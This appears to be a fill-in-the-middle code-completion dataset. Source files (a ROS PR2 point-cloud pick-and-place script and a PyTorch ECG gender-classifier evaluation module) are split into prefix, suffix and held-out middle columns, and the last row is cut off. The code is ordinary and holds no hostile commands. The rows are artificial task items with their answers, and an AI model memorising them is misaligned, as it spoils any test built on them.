file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
39k
| suffix
large_stringlengths 0
36.1k
| middle
large_stringlengths 0
29.4k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
project.py | #!/usr/bin/env python
# Import modules
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
import rospy
import tf
from geometry_msgs.msg import Pose
from std_msgs.msg import Float64
from std_msgs.msg import Int32
from std_msgs.msg import String
from pr2_robot.srv import *
from rospy_message_converter import message_converter
import yaml
# Helper function to get surface normals
def | (cloud):
get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)
return get_normals_prox(cloud).cluster
# Helper function to create a yaml friendly dictionary from ROS messages
def make_yaml_dict(test_scene_num, arm_name, object_name, pick_pose, place_pose):
yaml_dict = {}
yaml_dict["test_scene_num"] = test_scene_num.data
yaml_dict["arm_name"] = arm_name.data
yaml_dict["object_name"] = object_name.data
yaml_dict["pick_pose"] = message_converter.convert_ros_message_to_dictionary(pick_pose)
yaml_dict["place_pose"] = message_converter.convert_ros_message_to_dictionary(place_pose)
return yaml_dict
# Helper function to output to yaml file
def send_to_yaml(yaml_filename, dict_list):
print "sending to yaml", dict_list
for d in dict_list:
print "test_scene_num", type(d["test_scene_num"]), "arm_name", type(d["arm_name"]), "object_name", type(d["object_name"]), "pick_pose", type(d["pick_pose"]), "place_pose", type(d["place_pose"])
data_dict = {"object_list": dict_list}
with open(yaml_filename, 'w') as outfile:
yaml.dump(data_dict, outfile, default_flow_style=False)
def statistical_outlier_removal(cloud):
# Much like the previous filters, we start by creating a filter object:
outlier_filter = cloud.make_statistical_outlier_filter()
# Set the number of neighboring points to analyze for any given point
outlier_filter.set_mean_k(50)
# Set threshold scale factor
x = 0.9
# Any point with a mean distance larger than global (mean distance+x*std_dev) will be considered outlier
outlier_filter.set_std_dev_mul_thresh(x)
# Finally call the filter function for magic
cloud_filtered = outlier_filter.filter()
return cloud_filtered
def voxel_downsample(cloud):
""" Voxel Grid filter
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
Returns:
PointCloud_PointXYZRGB: A downsampled point cloud
"""
# Create a VoxelGrid filter object for our input point cloud
vox = cloud.make_voxel_grid_filter()
# Choose a voxel (also known as leaf) size
LEAF_SIZE = 0.005
# Set the voxel (or leaf) size
vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)
# Call the filter function to obtain the resultant downsampled point cloud
cloud_filtered = vox.filter()
return cloud_filtered
def apply_passthrough_filter(cloud, axis, axis_min, axis_max):
""" Apply a passthrough filter to a cloud
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
Returns:
PointCloud_PointXYZRGB: A filtered point cloud
"""
# Create a PassThrough filter object.
passthrough = cloud.make_passthrough_filter()
# Assign axis and range to the passthrough filter object.
filter_axis = axis
passthrough.set_filter_field_name(filter_axis)
#axis_min = 0.6
#axis_max = 1.1
passthrough.set_filter_limits(axis_min, axis_max)
# Finally use the filter function to obtain the resultant point cloud.
cloud_filtered = passthrough.filter()
return cloud_filtered
def ransac(cloud, sacmodel):
""" Segments a cloud using a sac model
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
sacmodel (pcl.SACMODEL): A model points will be fit to
Returns:
A set of inliers and coefficients
"""
# Create the segmentation object
seg = cloud.make_segmenter()
# Set the model you wish to fit
seg.set_model_type(sacmodel)
seg.set_method_type(pcl.SAC_RANSAC)
# Max distance for a point to be considered fitting the model
# Experiment with different values for max_distance
# for segmenting the table
max_distance = 0.01
seg.set_distance_threshold(max_distance)
# Call the segment function to obtain set of inlier indices and model coefficients
inliers, coefficients = seg.segment()
return inliers, coefficients
def euclidean_clustering(cloud):
white_cloud = XYZRGB_to_XYZ(cloud)
tree = white_cloud.make_kdtree()
# Create a cluster extraction object
ec = white_cloud.make_EuclideanClusterExtraction()
# Set tolerances for distance threshold
# as well as minimum and maximum cluster size (in points)
ec.set_ClusterTolerance(0.01)
ec.set_MinClusterSize(10)
ec.set_MaxClusterSize(25000)
# Search the k-d tree for clusters
ec.set_SearchMethod(tree)
# Extract indices for each of the discovered clusters
cluster_indices = ec.Extract()
return cluster_indices, white_cloud
def color_clusters(cluster_indices, white_cloud):
#Assign a color corresponding to each segmented object in scene
cluster_color = get_color_list(len(cluster_indices))
color_cluster_point_list = []
for j, indices in enumerate(cluster_indices):
for i, indice in enumerate(indices):
color_cluster_point_list.append([white_cloud[indice][0],
white_cloud[indice][1],
white_cloud[indice][2],
rgb_to_float(cluster_color[j])])
#Create new cloud containing all clusters, each with unique color
cluster_cloud = pcl.PointCloud_PointXYZRGB()
cluster_cloud.from_list(color_cluster_point_list)
return cluster_cloud
# Callback function for your Point Cloud Subscriber
def pcl_callback(pcl_msg):
# Exercise-2 TODOs:
# Convert ROS msg to PCL data
pcl_data = ros_to_pcl(pcl_msg)
#filename = 'pcl_data.pcd'
#pcl.save(pcl_data, filename)
# Statistical Outlier Filtering
cloud_filtered = statistical_outlier_removal(pcl_data)
#filename = 'statistical_outlier_removal.pcd'
#pcl.save(cloud_filtered, filename)
# Voxel Grid Downsampling
cloud_filtered = voxel_downsample(cloud_filtered)
#filename = 'voxel_downsampled.pcd'
#pcl.save(cloud_filtered, filename)
# PassThrough Filter along z
axis_min = 0.6
axis_max = 1.1
cloud_filtered = apply_passthrough_filter(cloud_filtered, 'z', axis_min, axis_max)
#filename = 'pass_through_filtered.pcd'
#pcl.save(cloud_filtered, filename)
# PassThrough Filter along y
axis_min = -0.5
axis_max = 0.5
cloud_filtered = apply_passthrough_filter(cloud_filtered, 'y', axis_min, axis_max)
filename = 'pass_through_filtered_y.pcd'
pcl.save(cloud_filtered, filename)
# RANSAC Plane Segmentation
inliers, coefficients = ransac(cloud_filtered, pcl.SACMODEL_PLANE)
# Extract inliers and outliers
extracted_inliers = cloud_filtered.extract(inliers, negative=False)
#filename = 'extracted_inliers.pcd'
#pcl.save(extracted_inliers, filename)
extracted_outliers = cloud_filtered.extract(inliers, negative=True)
#filename = 'extracted_outliers.pcd'
#pcl.save(extracted_outliers, filename)
cloud_table = extracted_inliers
cloud_objects = extracted_outliers
# Euclidean Clustering
cluster_indices, white_cloud = euclidean_clustering(cloud_objects)
# Create Cluster-Mask Point Cloud to visualize each cluster separately
cluster_cloud = color_clusters(cluster_indices, white_cloud)
filename = 'colored_cluster_cloud.pcd'
pcl.save(cluster_cloud, filename)
# Convert PCL data to ROS messages
ros_cloud_table = pcl_to_ros(cloud_table)
ros_cloud_objects = pcl_to_ros(cloud_objects)
ros_cluster_cloud = pcl_to_ros(cluster_cloud)
# Publish ROS messages
pcl_objects_pub.publish(ros_cloud_objects)
pcl_table_pub.publish(ros_cloud_table)
pcl_cluster_pub.publish(ros_cluster_cloud)
# Exercise-3 TODOs:
# Classify the clusters! (loop through each detected cluster one at a time)
detected_objects_labels = []
detected_objects = []
for index, pts_list in enumerate(cluster_indices):
# Grab the points for the cluster
pcl_cluster = cloud_objects.extract(pts_list)
# Compute the associated feature vector
ros_cluster = pcl_to_ros(pcl_cluster)
sample_cloud = ros_cluster
chists = compute_color_histograms(sample_cloud, using_hsv=True)
normals = get_normals(sample_cloud)
nhists = compute_normal_histograms(normals)
feature = np.concatenate((chists, nhists))
# Make the prediction
prediction = clf.predict(scaler.transform(feature.reshape(1,-1)))
label = encoder.inverse_transform(prediction)[0]
detected_objects_labels.append(label)
# Publish a label into RViz
label_pos = list(white_cloud[pts_list[0]])
label_pos[2] += .4
object_markers_pub.publish(make_label(label,label_pos, index))
# Add the detected object to the list of detected objects.
do = DetectedObject()
do.label = label
do.cloud = ros_cluster
detected_objects.append(do)
rospy.loginfo('Detected {} objects: {}'.format(len(detected_objects_labels), detected_objects_labels))
# Publish the list of detected objects
detected_objects_pub.publish(detected_objects)
# Suggested location for where to invoke your pr2_mover() function within pcl_callback()
# Could add some logic to determine whether or not your object detections are robust
# before calling pr2_mover()
detected_objects_list = detected_objects
try:
pr2_mover(detected_objects_list)
except rospy.ROSInterruptException:
pass
# function to load parameters and request PickPlace service
def pr2_mover(object_list):
# TODO: Initialize variables
dict_list = []
# TODO: Get/Read parameters
object_list_param = rospy.get_param('/object_list')
dropbox_list_param = rospy.get_param('/dropbox')
# TODO: Parse parameters into individual variables
test_scene_num = Int32()
test_scene_num.data = 3
""" labels = []
centroids = [] # to be list of tuples (x, y, z)
for object in object_list:
labels.append(object.label)
points_arr = ros_to_pcl(object.cloud).to_array()
centroids.append(np.mean(points_arr, axis=0)[:3])
"""
# TODO: Rotate PR2 in place to capture side tables for the collision map
# TODO: Loop through the pick list
for object in object_list:
# TODO: Get the PointCloud for a given object and obtain it's centroid
points_arr = ros_to_pcl(object.cloud).to_array()
c = np.mean(points_arr, axis=0)[:3]
centroid = map(np.asscalar, c)
print "type(centroid)", type(centroid), "[0]", type(centroid[0]), "[1]", type(centroid[1]), "[2]", type(centroid[2])
#centroids.append(np.mean(points_arr, axis=0)[:3])
object_name = String()
object_name.data = str(object.label)
# TODO: Create 'place_pose' for the object
group = None
for o in object_list_param:
if object.label == o['name']:
group = o['group']
print "for ", o['name'], "group found",group
object_arm_name = String()
place_pose = Pose()
for box in dropbox_list_param:
if group == box['group']:
# Assign the arm to be used for pick_place
object_arm_name.data = box['name']
place_pose.position.x = box['position'][0]
place_pose.position.y = box['position'][1]
place_pose.position.z = box['position'][2]
print "type(place_pose.x,y,z): (", type(place_pose.position.x), ",", type(place_pose.position.y), ",", type(place_pose.position.z), ")"
pick_pose = Pose()
pick_pose.position.x = centroid[0]
pick_pose.position.y = centroid[1]
pick_pose.position.z = centroid[2]
# TODO: Create a list of dictionaries (made with make_yaml_dict()) for later output to yaml format
yaml_dict = make_yaml_dict(test_scene_num, object_arm_name, object_name, pick_pose, place_pose)
dict_list.append(yaml_dict)
# Wait for 'pick_place_routine' service to come up
rospy.wait_for_service('pick_place_routine')
try:
pick_place_routine = rospy.ServiceProxy('pick_place_routine', PickPlace)
# Insert your message variables to be sent as a service request
resp = pick_place_routine(test_scene_num, object_name, object_arm_name, pick_pose, place_pose)
print ("Response: ",resp.success)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
# Output your request parameters into output yaml file
yaml_filename = "output_" + str(test_scene_num.data) + ".yaml"
send_to_yaml(yaml_filename, dict_list)
if __name__ == '__main__':
# ROS node initialization
rospy.init_node('clustering', anonymous=True)
# Create Subscribers
#pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
pcl_cam_sub = rospy.Subscriber("/pr2/world/points", pc2.PointCloud2, pcl_callback, queue_size=1)
# Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("/pcl_cluster", PointCloud2, queue_size=1)
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# Spin while node is not shutdown
while not rospy.is_shutdown():
rospy.spin()
| get_normals | identifier_name |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
|
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute scores for accuracy, precision, recall, f1 and auc
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samles, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samles):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='ATrain Gender loss') | conditional_block |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def | (module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
